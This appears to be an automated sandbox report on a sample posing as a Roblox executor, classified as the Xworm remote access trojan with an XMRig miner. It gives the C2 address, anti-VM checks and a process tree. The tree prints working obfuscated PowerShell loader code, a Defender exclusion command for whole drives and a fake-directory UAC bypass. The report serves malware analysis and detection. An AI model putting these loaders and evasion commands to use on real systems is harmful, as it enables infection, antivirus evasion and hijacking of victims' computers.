xmrig | e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a

Analysis

max time kernel
33s
max time network
37s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RblxExecutor.exe
Size

1.6MB
MD5

3a235f7f491d95d4727320239c0b4cb7
SHA1

b66d02b69f9d2cf011164406c6bc93a6728a65eb
SHA256

e9397b42b5c3f7770b873a76355bd59cbe097f30dc9b9349e9787832bbe9767a
SHA512

fa40f2d94bbe25372fc5eecb87168c3a55fb3fff1486ebd57d1f944760b43cc77a891fdbc246d5379e02b88b7f4f6abea0c94162e88ff87cabd246c7d8a5d83b
SSDEEP

24576:O83AQ99hyIMVdMJgsIX3b9M5Mm2f+qnbyy3q3PIMPKgPe8CWZoPJRMyoE:OWAE9AInJfF8dbRiteGmJKy

Score

10^/10

xmrig xworm evasion execution miner rat trojan

Malware Config

Extracted

Family

xworm

185.196.8.135:7000

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4196-56-0x00000204F8AD0000-0x00000204F8AE8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

RblxExecutor.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	RblxExecutor.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	RblxExecutor.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	RblxExecutor.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

RblxExecutor.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions RblxExecutor.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	RblxExecutor.exe

Looks for VirtualBox drivers on disk 2 TTPs 4 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

Processes:

RblxExecutor.exe

description	ioc	process
File opened (read-only)	C:\Windows\System32\drivers\VBoxMouse.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\VBoxGuest.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\VBoxSF.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\VBoxVideo.sys	RblxExecutor.exe

XMRig Miner payload 7 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4528-145-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/4528-144-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/4528-148-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/4528-150-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/4528-151-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/4528-149-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig
behavioral1/memory/4528-147-0x0000000140000000-0x00000001407CF000-memory.dmp	xmrig

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

21 4196 powershell.exe
30 4196 powershell.exe
31 4116 powershell.exe
35 4116 powershell.exe
37 4116 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4196 powershell.exe
2368 powershell.exe
4056 powershell.exe
5040 powershell.exe
3868 powershell.exe
4116 powershell.exe
3116 powershell.exe

flow	pid	process
21	4196	powershell.exe
30	4196	powershell.exe
31	4116	powershell.exe
35	4116	powershell.exe
37	4116	powershell.exe

pid	process
4196	powershell.exe
2368	powershell.exe
4056	powershell.exe
5040	powershell.exe
3868	powershell.exe
4116	powershell.exe
3116	powershell.exe

Looks for VMWare drivers on disk 2 TTPs 2 IoCs

evasion

File and Directory Discovery

T1083

Virtualization/Sandbox Evasion

T1497

Processes:

RblxExecutor.exe

description	ioc	process
File opened (read-only)	C:\Windows\System32\drivers\vmhgfs.sys	RblxExecutor.exe
File opened (read-only)	C:\Windows\System32\drivers\vmmouse.sys	RblxExecutor.exe

Executes dropped EXE 1 IoCs

Processes:

ComputerDefaults.exe

pid process

1832 ComputerDefaults.exe
Loads dropped DLL 1 IoCs

Processes:

ComputerDefaults.exe

pid process

1832 ComputerDefaults.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

35 bitbucket.org
34 bitbucket.org
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4116 set thread context of 4528 4116 powershell.exe AddInProcess.exe
Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5112 tasklist.exe
4360 tasklist.exe
4304 tasklist.exe
3956 tasklist.exe
4484 tasklist.exe
2744 tasklist.exe
1748 tasklist.exe
4516 tasklist.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

RblxExecutor.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName RblxExecutor.exe

pid	process
1832	ComputerDefaults.exe

pid	process
1832	ComputerDefaults.exe

flow	ioc
35	bitbucket.org
34	bitbucket.org

flow	ioc
20	ip-api.com

description	pid	process	target process
PID 4116 set thread context of 4528	4116	powershell.exe	AddInProcess.exe

pid	process
5112	tasklist.exe
4360	tasklist.exe
4304	tasklist.exe
3956	tasklist.exe
4484	tasklist.exe
2744	tasklist.exe
1748	tasklist.exe
4516	tasklist.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	RblxExecutor.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

RblxExecutor.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3288	RblxExecutor.exe
3288	RblxExecutor.exe
4116	powershell.exe
4116	powershell.exe
4196	powershell.exe
4196	powershell.exe
3116	powershell.exe
3116	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
4056	powershell.exe
4056	powershell.exe
404	powershell.exe
404	powershell.exe
404	powershell.exe
5040	powershell.exe
5040	powershell.exe
5040	powershell.exe
3920	powershell.exe
3920	powershell.exe
3920	powershell.exe
3868	powershell.exe
3868	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4360	tasklist.exe
Token: SeDebugPrivilege	4304	tasklist.exe
Token: SeDebugPrivilege	3956	tasklist.exe
Token: SeDebugPrivilege	4484	tasklist.exe
Token: SeDebugPrivilege	2744	tasklist.exe
Token: SeDebugPrivilege	1748	tasklist.exe
Token: SeDebugPrivilege	4516	tasklist.exe
Token: SeDebugPrivilege	5112	tasklist.exe
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	3116	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeIncreaseQuotaPrivilege	404	powershell.exe
Token: SeSecurityPrivilege	404	powershell.exe
Token: SeTakeOwnershipPrivilege	404	powershell.exe
Token: SeLoadDriverPrivilege	404	powershell.exe
Token: SeSystemProfilePrivilege	404	powershell.exe
Token: SeSystemtimePrivilege	404	powershell.exe
Token: SeProfSingleProcessPrivilege	404	powershell.exe
Token: SeIncBasePriorityPrivilege	404	powershell.exe
Token: SeCreatePagefilePrivilege	404	powershell.exe
Token: SeBackupPrivilege	404	powershell.exe
Token: SeRestorePrivilege	404	powershell.exe
Token: SeShutdownPrivilege	404	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeSystemEnvironmentPrivilege	404	powershell.exe
Token: SeRemoteShutdownPrivilege	404	powershell.exe
Token: SeUndockPrivilege	404	powershell.exe
Token: SeManageVolumePrivilege	404	powershell.exe
Token: 33	404	powershell.exe
Token: 34	404	powershell.exe
Token: 35	404	powershell.exe
Token: 36	404	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeIncreaseQuotaPrivilege	5040	powershell.exe
Token: SeSecurityPrivilege	5040	powershell.exe
Token: SeTakeOwnershipPrivilege	5040	powershell.exe
Token: SeLoadDriverPrivilege	5040	powershell.exe
Token: SeSystemProfilePrivilege	5040	powershell.exe
Token: SeSystemtimePrivilege	5040	powershell.exe
Token: SeProfSingleProcessPrivilege	5040	powershell.exe
Token: SeIncBasePriorityPrivilege	5040	powershell.exe
Token: SeCreatePagefilePrivilege	5040	powershell.exe
Token: SeBackupPrivilege	5040	powershell.exe
Token: SeRestorePrivilege	5040	powershell.exe
Token: SeShutdownPrivilege	5040	powershell.exe
Token: SeDebugPrivilege	5040	powershell.exe
Token: SeSystemEnvironmentPrivilege	5040	powershell.exe
Token: SeRemoteShutdownPrivilege	5040	powershell.exe
Token: SeUndockPrivilege	5040	powershell.exe
Token: SeManageVolumePrivilege	5040	powershell.exe
Token: 33	5040	powershell.exe
Token: 34	5040	powershell.exe
Token: 35	5040	powershell.exe
Token: 36	5040	powershell.exe
Token: SeIncreaseQuotaPrivilege	5040	powershell.exe
Token: SeSecurityPrivilege	5040	powershell.exe
Token: SeTakeOwnershipPrivilege	5040	powershell.exe
Token: SeLoadDriverPrivilege	5040	powershell.exe
Token: SeSystemProfilePrivilege	5040	powershell.exe
Token: SeSystemtimePrivilege	5040	powershell.exe
Token: SeProfSingleProcessPrivilege	5040	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AddInProcess.exe

pid process

4528 AddInProcess.exe

pid	process
4528	AddInProcess.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

RblxExecutor.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3288 wrote to memory of 3928	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 3928	3288	RblxExecutor.exe	cmd.exe
PID 3928 wrote to memory of 4360	3928	cmd.exe	tasklist.exe
PID 3928 wrote to memory of 4360	3928	cmd.exe	tasklist.exe
PID 3928 wrote to memory of 2896	3928	cmd.exe	find.exe
PID 3928 wrote to memory of 2896	3928	cmd.exe	find.exe
PID 3288 wrote to memory of 2288	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 2288	3288	RblxExecutor.exe	cmd.exe
PID 2288 wrote to memory of 4304	2288	cmd.exe	tasklist.exe
PID 2288 wrote to memory of 4304	2288	cmd.exe	tasklist.exe
PID 2288 wrote to memory of 2608	2288	cmd.exe	find.exe
PID 2288 wrote to memory of 2608	2288	cmd.exe	find.exe
PID 3288 wrote to memory of 4272	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 4272	3288	RblxExecutor.exe	cmd.exe
PID 4272 wrote to memory of 3956	4272	cmd.exe	tasklist.exe
PID 4272 wrote to memory of 3956	4272	cmd.exe	tasklist.exe
PID 4272 wrote to memory of 3040	4272	cmd.exe	find.exe
PID 4272 wrote to memory of 3040	4272	cmd.exe	find.exe
PID 3288 wrote to memory of 5056	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 5056	3288	RblxExecutor.exe	cmd.exe
PID 5056 wrote to memory of 4484	5056	cmd.exe	tasklist.exe
PID 5056 wrote to memory of 4484	5056	cmd.exe	tasklist.exe
PID 5056 wrote to memory of 3584	5056	cmd.exe	find.exe
PID 5056 wrote to memory of 3584	5056	cmd.exe	find.exe
PID 3288 wrote to memory of 2128	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 2128	3288	RblxExecutor.exe	cmd.exe
PID 2128 wrote to memory of 2744	2128	cmd.exe	tasklist.exe
PID 2128 wrote to memory of 2744	2128	cmd.exe	tasklist.exe
PID 2128 wrote to memory of 1724	2128	cmd.exe	find.exe
PID 2128 wrote to memory of 1724	2128	cmd.exe	find.exe
PID 3288 wrote to memory of 2928	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 2928	3288	RblxExecutor.exe	cmd.exe
PID 2928 wrote to memory of 1748	2928	cmd.exe	tasklist.exe
PID 2928 wrote to memory of 1748	2928	cmd.exe	tasklist.exe
PID 2928 wrote to memory of 3280	2928	cmd.exe	find.exe
PID 2928 wrote to memory of 3280	2928	cmd.exe	find.exe
PID 3288 wrote to memory of 4408	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 4408	3288	RblxExecutor.exe	cmd.exe
PID 4408 wrote to memory of 4516	4408	cmd.exe	tasklist.exe
PID 4408 wrote to memory of 4516	4408	cmd.exe	tasklist.exe
PID 4408 wrote to memory of 2160	4408	cmd.exe	find.exe
PID 4408 wrote to memory of 2160	4408	cmd.exe	find.exe
PID 3288 wrote to memory of 2028	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 2028	3288	RblxExecutor.exe	cmd.exe
PID 2028 wrote to memory of 5112	2028	cmd.exe	tasklist.exe
PID 2028 wrote to memory of 5112	2028	cmd.exe	tasklist.exe
PID 2028 wrote to memory of 976	2028	cmd.exe	find.exe
PID 2028 wrote to memory of 976	2028	cmd.exe	find.exe
PID 3288 wrote to memory of 4280	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 4280	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 4068	3288	RblxExecutor.exe	cmd.exe
PID 3288 wrote to memory of 4068	3288	RblxExecutor.exe	cmd.exe
PID 4068 wrote to memory of 3180	4068	cmd.exe	cmd.exe
PID 4068 wrote to memory of 3180	4068	cmd.exe	cmd.exe
PID 4280 wrote to memory of 2064	4280	cmd.exe	cmd.exe
PID 4280 wrote to memory of 2064	4280	cmd.exe	cmd.exe
PID 4068 wrote to memory of 804	4068	cmd.exe	cmd.exe
PID 4068 wrote to memory of 804	4068	cmd.exe	cmd.exe
PID 4068 wrote to memory of 4116	4068	cmd.exe	powershell.exe
PID 4068 wrote to memory of 4116	4068	cmd.exe	powershell.exe
PID 4280 wrote to memory of 2104	4280	cmd.exe	cmd.exe
PID 4280 wrote to memory of 2104	4280	cmd.exe	cmd.exe
PID 4280 wrote to memory of 4196	4280	cmd.exe	powershell.exe
PID 4280 wrote to memory of 4196	4280	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe
"C:\Users\Admin\AppData\Local\Temp\RblxExecutor.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare drivers on disk
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmtoolsd.exe" 2>NUL | find /I "vmtoolsd.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmtoolsd.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\system32\find.exe
find /I "vmtoolsd.exe"
3⤵
PID:2896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxservice.exe" 2>NUL | find /I "vboxservice.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vboxservice.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\system32\find.exe
find /I "vboxservice.exe"
3⤵
PID:2608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwaretray.exe" 2>NUL | find /I "vmwaretray.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmwaretray.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\system32\find.exe
find /I "vmwaretray.exe"
3⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmwareuser.exe" 2>NUL | find /I "vmwareuser.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmwareuser.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4484

C:\Windows\system32\find.exe
find /I "vmwareuser.exe"
3⤵
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vmsrvc.exe" 2>NUL | find /I "vmsrvc.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vmsrvc.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Windows\system32\find.exe
find /I "vmsrvc.exe"
3⤵
PID:1724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe" 2>NUL | find /I "Any.Run-VM-X64.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:2928

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq Any.Run-VM-X64.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\find.exe
find /I "Any.Run-VM-X64.exe"
3⤵
PID:3280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq vboxtray.exe" 2>NUL | find /I "vboxtray.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:4408

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq vboxtray.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Windows\system32\find.exe
find /I "vboxtray.exe"
3⤵
PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /FI "IMAGENAME eq VBoxService.exe" 2>NUL | find /I "VBoxService.exe" >NUL
2⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq VBoxService.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\system32\find.exe
find /I "VBoxService.exe"
3⤵
PID:976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedist.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:4280

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:2064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Al1zbpAcw0p1Fl078pB2HtNXnQs0rbUPPgfd/fVywvU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c9QR5kB90gp/nHGBONlVKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PUtXp=New-Object System.IO.MemoryStream(,$param_var); $QjusM=New-Object System.IO.MemoryStream; $jUotk=New-Object System.IO.Compression.GZipStream($PUtXp, [IO.Compression.CompressionMode]::Decompress); $jUotk.CopyTo($QjusM); $jUotk.Dispose(); $PUtXp.Dispose(); $QjusM.Dispose(); $QjusM.ToArray();}function execute_function($param_var,$param2_var){ $wbVDd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vzMCH=$wbVDd.EntryPoint; $vzMCH.Invoke($null, $param2_var);}$wGIQB = 'C:\Users\Admin\AppData\Local\Temp\VCRedist.bat';$host.UI.RawUI.WindowTitle = $wGIQB;$pFEsp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wGIQB).Split([Environment]::NewLine);foreach ($QqrJY in $pFEsp) { if ($QqrJY.StartsWith('PDfUAcFoTbCJIUyLDOns')) { $XhjVr=$QqrJY.Substring(20); break; }}$payloads_var=[string[]]$XhjVr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:2104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\VCRedists.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:3180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\VCRedists.bat';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
4⤵
PID:2008

C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1832

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
6⤵
PID:4092

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
7⤵
PID:1264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW9kWnzh6gT94E6QwCw/S2tqBrnaZOi3/1x2/WmbziY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OAdUsJh095yGIv9rWxpY0Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BRnNz=New-Object System.IO.MemoryStream(,$param_var); $NGgnI=New-Object System.IO.MemoryStream; $wsPQU=New-Object System.IO.Compression.GZipStream($BRnNz, [IO.Compression.CompressionMode]::Decompress); $wsPQU.CopyTo($NGgnI); $wsPQU.Dispose(); $BRnNz.Dispose(); $NGgnI.Dispose(); $NGgnI.ToArray();}function execute_function($param_var,$param2_var){ $IhuXj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KlRZf=$IhuXj.EntryPoint; $KlRZf.Invoke($null, $param2_var);}$dhwZW = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $dhwZW;$IVamj=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dhwZW).Split([Environment]::NewLine);foreach ($qmDVW in $IVamj) { if ($qmDVW.StartsWith('EPPMCDiGgDdpsovvYHWW')) { $utdAo=$qmDVW.Substring(20); break; }}$payloads_var=[string[]]$utdAo.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
7⤵
PID:3928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
